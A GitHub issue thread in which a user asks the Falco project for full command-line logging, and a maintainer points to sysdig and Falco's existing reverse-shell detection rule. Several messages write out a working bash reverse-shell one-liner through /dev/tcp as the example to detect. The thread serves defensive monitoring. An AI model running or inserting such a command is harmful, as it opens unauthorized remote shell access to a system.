support raw log output and capturing the full command line

[Jumbo-WJB]

Motivation

I hope Falco can support raw log output, such as all process creation, file read/write operations, etc. This can help in better contextual analysis. I also hope that the logs of process creation can be more detailed. Due to limitations with execve, commands like bash -i >& /dev/tcp/192.168.1.1/2333 0>&1 only show bash -i in the command line, and the rest of the command is not recorded. I have tried using audit and some eBPF tools but could not obtain the complete command line.

Feature

I wish for Falco to support raw log output, capturing all operations like process creation and file read/write. Additionally, I hope for more detailed logging of process creation, capturing the full command line even for complex commands like bash -i >& /dev/tcp/192.168.1.1/2333 0>&1.

Alternatives

I have considered using audit and some eBPF tools, but none of them were able to capture the complete command line for process creation.

Additional context

Adding this feature will significantly enhance contextual analysis capabilities, making it easier to investigate and understand the full scope of events.

[Issif]

Hello @Jumbo-WJB,

The tool you're looking for already exists, it's more or less the "big brother" of Falco. Both have been created by Sysdig and use the same technologies/libs underlying. This tool is https://github.com/draios/sysdig/, it allows you to captures the syscalls following filters (same fields and logic than those used in the Falco rules). The captures can be then be read and pass through chisel to format the results.

To know more, you can read a post I wrote about it years ago https://github.com/Issif/sysdig-vs-malware or watch a talk I did at KCD Czech & Slovak 2w ago https://www.youtube.com/watch?v=ScluwvDdYqg.

Moreover, as the libs and the syntax are the same, you use the captures made by sysdig as source for Falco, it allows use to tune the rules "on cold".

[Jumbo-WJB]

@Issif Thank you. I will look into the tools and YouTube

[Jumbo-WJB]

Through sysdig and YouTube, I found that sysdig and Falco are great tools. However, regarding the command bash -i >& /dev/tcp/192.168.1.1/2333 0>&1, I discovered that using execve cannot capture the full command line because the commands after the pipe symbol are executed within the shell interpreter without creating a new subprocess. Therefore, using execve for this command only yields the simple result bash -i. Of course, the command bash -i >& /dev/tcp/192.168.1.1/2333 0>&1 can be detected and alerted by monitoring the file descriptors of the bash process. However, if I want to capture the full command line, can Falco help me with this?

[Issif]

I see your point, I did some tests on my side. Effectively, I wasn't able to catch the exact command used to create the reverse shell.

1267 12:34:09.309076762 0 bash (15660.15660) < execve res=0 exe=bash args=-i. tid=15660(bash) pid=15660(bash) ptid=14475(bash) cwd=<NA> fdlimit=1073741816 pgft_maj=0 pgft_min=54 vm_size=1800 vm_rss=4 vm_swap=0 comm=bash cgroups=cpuset=/system.slice/docker-a99860c5ab2331098d00fba3948beb55f07f34addff0d7f40... env=HOSTNAME=a99860c5ab23.PWD=/.HOME=/root.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00... tty=34816 pgid=20 loginuid=-1(<NONE>) flags=1(EXE_WRITABLE) cap_inheritable=0 cap_permitted=A80425FB cap_effective=A80425FB exe_ino=475 exe_ino_ctime=2024-04-08 09:29:48.832867775 exe_ino_mtime=2022-01-06 16:23:33.000000000 uid=0(<NA>) trusted_exepath=/usr/bin/bash

On the other side, this is not the philosophy of Falco to "capture" this whole command, it has been created to detect the finality, which is the reverse shell. In other words, the redirections to a network connection of the stdin/out. We have a rule for that: https://falco.org/docs/reference/rules/default-rules/#Redirect_STDOUT/STDIN_to_Network_Connection_in_Container and you can find a blog post from Sysdig which explains what are the reverse shells and how to detect them with Falco https://sysdig.com/blog/reverse-shell-falco-sysdig-secure/

[poiana]

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale